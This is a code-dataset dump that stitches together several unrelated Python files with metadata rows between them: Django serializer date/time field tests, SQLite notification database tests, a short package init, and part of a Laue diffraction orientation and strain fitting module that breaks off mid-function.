"BSD-3-Clause"
] | 1
|
2020-02-05T15:09:47.000Z
|
2020-02-05T15:09:47.000Z
|
from datetime import date, datetime, time
import pytest
import pytz
from django.test import override_settings
from rest_framework.exceptions import ValidationError
from bridger.serializers import DateField, DateTimeField, TimeField
from bridger.serializers.fields.types import BridgerType
from ...models import ModelTest
class TestDateTimeField:
def setup_method(self):
self.field = DateTimeField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected",
[
("2019-01-01T10:00", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00+0100", datetime(2019, 1, 1, 10, 0)),
("2019-01-01T10:00:00Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00+0000", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00+0100", datetime(2019, 1, 1, 10, 0)),
("2019-01-01T10:00:00.0000Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00.0000+0100", datetime(2019, 1, 1, 10, 0)),
],
)
@override_settings(TIME_ZONE="UCT", USE_TZ=True)
def test_to_internal_value(self, input, expected):
expected = pytz.timezone("Europe/Berlin").localize(expected)
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "200-00-10", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
@override_settings(TIME_ZONE="Europe/Berlin")
def test_to_representation_non_utc(self):
localized_dt = pytz.timezone("Europe/Berlin").localize(datetime(2019, 1, 1, 10, 0))
assert self.field.to_representation(localized_dt) == "2019-01-01T10:00:00+0100"
@override_settings(TIME_ZONE="UCT", USE_TZ=True)
def test_to_representation_utc(self):
localized_dt = pytz.timezone("UCT").localize(datetime(2019, 1, 1, 10, 0))
assert self.field.to_representation(localized_dt) == "2019-01-01T10:00:00+0000"
def test_field_type(self):
assert self.field.field_type == BridgerType.DATETIME.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
class TestDateField:
def setup_method(self):
self.field = DateField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected", [(date(2019, 1, 1), date(2019, 1, 1)), ("2019-01-01", date(2019, 1, 1))],
)
def test_to_internal_value(self, input, expected):
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "200-00-10", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
def test_to_representation(self):
assert self.field.to_representation(date(2019, 1, 1)) == "2019-01-01"
def test_field_type(self):
assert self.field.field_type == BridgerType.DATE.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
class TestTimeField:
def setup_method(self):
self.field = TimeField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected",
[(time(10, 0), time(10, 0)), ("10:00", time(10, 0)), ("10:00:00", time(10, 0)), ("10:00:00.0000", time(10, 0)),],
)
def test_to_internal_value(self, input, expected):
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "111", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
def test_to_representation(self):
assert self.field.to_representation(time(10, 0, 0, 0)) == "10:00:00"
def test_field_type(self):
assert self.field.field_type == BridgerType.TIME.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
| 35.751825
| 121
| 0.623724
| 623
| 4,898
| 4.741573
| 0.139647
| 0.076168
| 0.081246
| 0.070752
| 0.820582
| 0.80264
| 0.751523
| 0.722749
| 0.712593
| 0.703114
| 0
| 0.095327
| 0.231115
| 4,898
| 136
| 122
| 36.014706
| 0.68906
| 0
| 0
| 0.574074
| 0
| 0
| 0.119232
| 0.034912
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.203704
| false
| 0
| 0.074074
| 0
| 0.305556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
518d1445820f38b784ee88854d48060963cc5ebd
| 9,565
|
py
|
Python
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 10
|
2017-10-22T20:07:40.000Z
|
2018-08-01T21:48:49.000Z
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 81
|
2017-08-19T15:38:32.000Z
|
2020-05-12T09:56:14.000Z
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 9
|
2017-09-19T07:12:20.000Z
|
2021-05-25T17:09:27.000Z
|
# -*- coding: utf-8 -*-
def test_schema_sqlite(sqlite_db):
"""Test init_schema creates empty tables"""
yo_db = sqlite_db
m = MetaData()
m.create_all(bind=yo_db.engine)
for table in m.tables.values():
with yo_db.acquire_conn() as conn:
query = table.select().where(True)
response = conn.execute(query).fetchall()
assert len(response) == 0, '%s should have 0 rows' % table
def test_create_notification(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'to_username': 'testuser1337',
'from_username': 'testuser1336',
'notify_type': 'vote',
'trx_id': '123abc'
}
yo_db = sqlite_db
retval = yo_db.create_db_notification(**test_data)
assert retval is True
result = yo_db.get_db_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert result['from_username'] == 'testuser1336'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# notifications only columns
assert result['trx_id'] == '123abc'
def test_create_wwwpoll_notification(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
retval = yo_db.create_wwwpoll_notification(**test_data)
assert retval is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# wwwpoll only columns
assert result['read'] == False
assert result['shown'] == False
def test_get_notifications(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'to_username': 'testuser1337',
'from_username': 'testuser1336',
'notify_type': 'vote',
'trx_id': '123abc'
}
yo_db = sqlite_db
retval = yo_db.create_db_notification(**test_data)
assert retval is True
result = yo_db.get_db_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert result['from_username'] == 'testuser1336'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# notifications only columns
assert result['trx_id'] == '123abc'
def test_get_wwwpoll_notifications(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
}
yo_db = sqlite_db
retval = yo_db.create_wwwpoll_notification(**test_data)
assert retval is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# wwwpoll only columns
assert result['read'] == False
assert result['shown'] == False
def test_wwpoll_mark_shown(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is False
_ = yo_db.wwwpoll_mark_shown(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is True
def test_wwpoll_mark_unshown(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
'shown': True
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is True
_ = yo_db.wwwpoll_mark_unshown(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is False
def test_wwpoll_mark_read(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is False
_ = yo_db.wwwpoll_mark_read(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is True
def test_wwpoll_mark_unread(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
'read': True
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is True
_ = yo_db.wwwpoll_mark_unread(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is False
def test_create_user(sqlite_db):
yo_db = sqlite_db
result = yo_db.create_user(username='testuser')
assert result is True
transports = yo_db.get_user_transports(username='testuser')
assert transports == DEFAULT_USER_TRANSPORT_SETTINGS
def test_get_user_transports_user_doesnt_exist(sqlite_db):
yo_db = sqlite_db
transports = yo_db.get_user_transports(username='testuser')
assert transports == DEFAULT_USER_TRANSPORT_SETTINGS
def test_get_user_transports_user_exists(sqlite_db):
yo_db = sqlite_db
result = yo_db.set_user_transports(username='testuser',
transports=TEST_USER_TRANSPORT_SETTINGS)
assert result is True
transports = yo_db.get_user_transports(username='testuser')
assert transports == TEST_USER_TRANSPORT_SETTINGS
def test_set_user_transports(sqlite_db):
yo_db = sqlite_db
_ = yo_db.set_user_transports(username='testuser',
transports=TEST_USER_TRANSPORT_SETTINGS)
assert yo_db.get_user_transports(username='testuser')
| 29.072948
| 79
| 0.593204
| 1,047
| 9,565
| 5.13085
| 0.095511
| 0.034252
| 0.098287
| 0.029039
| 0.920514
| 0.909531
| 0.884587
| 0.877699
| 0.877699
| 0.867275
| 0
| 0.039925
| 0.279875
| 9,565
| 328
| 80
| 29.161585
| 0.739983
| 0.016309
| 0
| 0.790875
| 0
| 0
| 0.211299
| 0
| 0
| 0
| 0
| 0
| 0.193916
| 1
| 0.04943
| false
| 0
| 0
| 0
| 0.04943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ba2f553a59423ee0c33c384ecf1a568ac7029c
| 132
|
py
|
Python
|
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
#from preprocess import *
#from bow import *
from .preprocess import *
from .bow import *
from . import LDA
from . import multimix
| 16.5
| 25
| 0.734848
| 18
| 132
| 5.388889
| 0.333333
| 0.412371
| 0.412371
| 0.494845
| 0.721649
| 0.721649
| 0.721649
| 0
| 0
| 0
| 0
| 0
| 0.189394
| 132
| 7
| 26
| 18.857143
| 0.906542
| 0.310606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
51c436f8a1fe9a9cea19ae4ef38c82cf04e5146e
| 123,175
|
py
|
Python
|
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Module of Lauetools project
JS Micha Feb 2012
module to fit orientation and strain
http://sourceforge.net/projects/lauetools/
"""
__author__ = "Jean-Sebastien Micha, CRG-IF BM32 @ ESRF"
from scipy.optimize import leastsq, least_squares
import numpy as np
np.set_printoptions(precision=15)
from scipy.linalg import qr
try:
from lauetools import CrystalParameters as CP
from lauetools import generaltools as GT
from lauetools import LaueGeometry as F2TC
from lauetools import dict_LaueTools as DictLT
from lauetools.dict_LaueTools import DEG
except:
import lauetoolsnn.lauetools.CrystalParameters as CP
import lauetoolsnn.lauetools.generaltools as GT
import lauetoolsnn.lauetools.LaueGeometry as F2TC
import lauetoolsnn.lauetools.dict_LaueTools as DictLT
from lauetoolsnn.lauetools.dict_LaueTools import DEG
RAD = 1.0 / DEG
IDENTITYMATRIX = np.eye(3)
def remove_harmonic(hkl, uflab, yz):
# print "removing harmonics from theoretical peak list"
nn = len(uflab[:, 0])
isbadpeak = np.zeros(nn, dtype=np.int)
toluf = 0.05
for i in list(range(nn)):
if isbadpeak[i] == 0:
for j in list(range(i + 1, nn)):
if isbadpeak[j] == 0:
if GT.norme_vec(uflab[j, :] - uflab[i, :]) < toluf:
isbadpeak[j] = 1
# print "harmonics :"
# print hkl[i,:]
# print hkl[j,:]
# print "isbadpeak = ", isbadpeak
index_goodpeak = np.where(isbadpeak == 0)
# print "index_goodpeak =", index_goodpeak
hkl2 = hkl[index_goodpeak]
uflab2 = uflab[index_goodpeak]
yz2 = yz[index_goodpeak]
nspots2 = len(hkl2[:, 0])
return (hkl2, uflab2, yz2, nspots2, isbadpeak)
def xy_from_Quat(varying_parameter_values, DATA_Q, nspots, varying_parameter_indices,
allparameters,
initrot=None,
vecteurref=IDENTITYMATRIX,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
kf_direction="Z>0"):
"""
compute x and y pixel positions of Laue spots given hkl list
DATA_Q: array of all 3 elements miller indices
nspots: indices of selected spots of DATA_Q
initrot: initial orientation matrix (rotation and distorsion)
varying_parameter_values: array of value that will be taken into account
varying_parameter_indices: list of indices (element position) of
varying parameters in allparameters array
allparameters: array of 8 elements: 5 first of calibration parameters
and 3 of angles defining quaternion
WARNING: All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat
WARNING2: len(varying_parameter_values)=len(varying_parameter_indices)
returns:
array of x y pixel positions of Laue peaks
"""
allparameters.put(varying_parameter_indices, varying_parameter_values)
calibration_parameters = allparameters[:5]
# selecting nspots of DATA_Q
DATAQ = np.take(DATA_Q, nspots, axis=0)
trQ = np.transpose(DATAQ) # np.array(Hs, Ks,Ls) for further computations
if initrot is not None:
# R is a pure rotation
# dot(R,Q)=initrot
# Q may be viewed as lattice distortion
if pureRotation: # extract pure rotation matrix from UB matrix
R, Q = qr(initrot)
R = R / np.sign(np.diag(Q))
else: # keep UB matrix rotation + distorsion
R = initrot
# initial lattice rotation and distorsion (/ cubic structure) q = U*B * Q
trQ = np.dot(np.dot(R, vecteurref), trQ)
# results are qx,qy,qz
else:
print("I DONT LIKE INITROT == None")
print("this must mean that INITROT = Identity ?...")
if 0:
angle_Quat = allparameters[5:8] # three angles of quaternion
# with sample rotation
# print "3 angles representation of quaternion",angle_Quat
Quat = GT.from3rotangles_toQuat(angle_Quat)
# print "Quat",Quat
matfromQuat = np.array(GT.fromQuat_to_MatrixRot(Quat))
# print "matfromQuat", matfromQuat
else:
matfromQuat = np.eye(3)
Qrot = np.dot(matfromQuat, trQ) # lattice rotation due to quaternion
Qrotn = np.sqrt(np.sum(Qrot ** 2, axis=0)) # norms of Q vectors
twthe, chi = F2TC.from_qunit_to_twchi(1.*Qrot / Qrotn)
# if verbose:
# print("matfromQuat", matfromQuat)
# print("tDATA_Q", np.transpose(DATA_Q))
# print("Qrot", Qrot)
# print("Qrotn", Qrotn)
# print("Qrot/Qrotn", Qrot / Qrotn)
# print("twthe,chi", twthe, chi)
X, Y, theta = F2TC.calc_xycam_from2thetachi(twthe,
chi,
calibration_parameters,
verbose=0,
pixelsize=pixelsize,
kf_direction=kf_direction)
return X, Y, theta, R
def calc_XY_pixelpositions(calibration_parameters, DATA_Q, nspots, UBmatrix=None,
B0matrix=IDENTITYMATRIX,
offset=0,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=0.079,
dim=(2048, 2048),
kf_direction="Z>0"):
"""
must: len(varying_parameter_values)=len(varying_parameter_indices)
DATA_Q: array of all 3 elements miller indices
nspots: indices of selected spots of DATA_Q
UBmatrix:
WARNING: All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat
returns:
"""
# selecting nspots of DATA_Q
# print "DATA_Q in calc_XY_pixelpositions", DATA_Q
# print "nspots", nspots
# print "len(DATA_Q)", len(DATA_Q)
DATAQ = np.take(DATA_Q, nspots, axis=0)
trQ = np.transpose(DATAQ) # np.array(Hs, Ks,Ls) for further computations
# print "DATAQ in xy_from_Quat", DATAQ
if UBmatrix is not None:
R = UBmatrix
# q = UB * B0 * Q
trQ = np.dot(np.dot(R, B0matrix), trQ)
# results are qx,qy,qz
else:
print("I DON'T LIKE INITROT == None")
print("this must mean that INITROT = Identity ?...")
Qrot = trQ # lattice rotation due to quaternion
Qrotn = np.sqrt(np.sum(Qrot ** 2, axis=0)) # norms of Q vectors
twthe, chi = F2TC.from_qunit_to_twchi(Qrot / Qrotn, labXMAS=labXMAS)
# print "twthe, chi", twthe, chi
if verbose:
print("tDATA_Q", np.transpose(DATA_Q))
print("Qrot", Qrot)
print("Qrotn", Qrotn)
print("Qrot/Qrotn", Qrot / Qrotn)
print("twthe,chi", twthe, chi)
X, Y, theta = F2TC.calc_xycam_from2thetachi(
twthe,
chi,
calibration_parameters,
offset=offset,
verbose=0,
pixelsize=pixelsize,
kf_direction=kf_direction)
return X, Y, theta, R
def error_function_on_demand_calibration(param_calib,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
allspots_info=0,
kf_direction="Z>0"):
"""
#All miller indices must be entered in DATA_Q,
selection is done in xy_from_Quat with nspots (array of indices)
# param_orient is three elements array representation of quaternion
"""
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
invsq2 = 1 / np.sqrt(2)
AXIS1,AXIS2, AXIS3 = np.array([[invsq2,-.5,.5],[invsq2,.5,-.5],[0,invsq2,invsq2]])
if 5 in arr_indexvaryingparameters:
ind1 = np.where(arr_indexvaryingparameters == 5)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_calib[ind1] * DEG
else:
a1 = param_calib[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
mat1 = GT.matRot(AXIS1, a1/DEG)
if 6 in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == 6)[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_calib[ind2] * DEG
else:
a2 = param_calib[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
mat2 = GT.matRot(AXIS2, a2/DEG)
if 7 in arr_indexvaryingparameters:
ind3 = np.where(arr_indexvaryingparameters == 7)[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_calib[ind3] * DEG
else:
a3 = param_calib[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
mat3 = GT.matRot(AXIS3, a3/DEG)
deltamat = np.dot(mat3, np.dot(mat2, mat1))
newmatrix = np.dot(deltamat, initrot)
# three last parameters are orientation angles in quaternion expression
onlydetectorindices = arr_indexvaryingparameters[arr_indexvaryingparameters < 5]
X, Y, theta, _ = xy_from_Quat(param_calib,
DATA_Q,
nspots,
onlydetectorindices,
allparameters,
initrot=newmatrix,
vecteurref=vecteurref,
pureRotation=pureRotation,
labXMAS=0,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
if (weights is not None): # take into account the exp. spots intensity as weight in cost distance function
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# print "**mean weighted distanceterm ",mean(distanceterm)," ********"
# print "**mean distanceterm ",mean(distanceterm)," ********"
if allspots_info == 0:
if verbose:
# print "X",X
# print "pixX",pixX
# print "Y",Y
# print "pixY",pixY
# print "param_orient",param_calib
# print "distanceterm",distanceterm
# print "*****************mean distanceterm ",mean(distanceterm)," ********"
# print "newmatrix", newmatrix
return distanceterm, deltamat, newmatrix
else:
return distanceterm
elif allspots_info == 1:
Xtheo = X
Ytheo = Y
Xexp = pixX
Yexp = pixY
Xdev = Xtheo - Xexp
Ydev = Ytheo - Yexp
theta_theo = theta
spotsData = [Xtheo, Ytheo, Xexp, Yexp, Xdev, Ydev, theta_theo]
return distanceterm, deltamat, newmatrix, spotsData
def fit_on_demand_calibration(starting_param, miller, allparameters,
_error_function_on_demand_calibration,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
#All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
parameters = ["distance (mm)",
"Xcen (pixel)",
"Ycen (pixel)",
"Angle1 (deg)",
"Angle2 (deg)",
"theta1",
"theta2",
"theta3"]
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_calib_0 = starting_param
if verbose:
# print(
# "\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_calibration(param_calib_0,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
vecteurref=vecteurref,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ", parameters_being_fitted,
# "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", param_calib_0)
# setting keywords of _error_function_on_demand_calibration during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_calibration.__defaults__ = (initrot,
vecteurref,
pureRotation,
0,
pixelsize,
dim,
weights,
0,
kf_direction)
# For transmission geometry , changing gam scale is useful
# x_scale = [1,1,1,1,.1,1,1,1] 1 except for xgam .1
xscale = np.ones(len(arr_indexvaryingparameters))
try:
posgam = arr_indexvaryingparameters.tolist().index(4)
xscale[posgam] = .1
except ValueError:
pass
#------------------------
calib_sol2 = least_squares(_error_function_on_demand_calibration,
param_calib_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
tr_solver = 'exact',
x_scale=xscale, max_nfev=None)
# print("\nLEAST_SQUARES")
# #print("calib_sol2", calib_sol2['x'])
# print(calib_sol2['x'])
# print('mean residues', np.mean(calib_sol2['fun']))
return calib_sol2['x']
# LEASTSQUARE
calib_sol = leastsq(_error_function_on_demand_calibration,
param_calib_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
maxfev=5000,
**kwd) # args=(rre,ertetr,) last , is important!
if calib_sol[-1] in (1, 2, 3, 4, 5):
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_calibration(calib_sol[0],
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
return calib_sol[0] # 5 detector parameters + deltaangles
else:
return None
def error_function_on_demand_strain(param_strain,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048.,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0"):
"""
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters of strain + 3 angles of elementary rotation
# param_strain must contain values of one or many parameters of allparameters
#
# strain = param_strain[:5]
# deltaangles = param_strain[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in param_strain
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12]) for strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
Bmat= B0 matrix
"""
#print('param_strain in error_function_on_demand_strain', param_strain)
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
# arr_indexvaryingparameters = [5,6,7,8,9,10,11,12] first 5 params for strain and 3 last for rotation
index_of_rot_in_arr_indexvaryingparameters = [10, 11, 12]
if index_of_rot_in_arr_indexvaryingparameters[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[0]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)], [0, 1, 0], [-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters[1] in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0], [0, np.cos(a2), np.sin(a2)], [0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
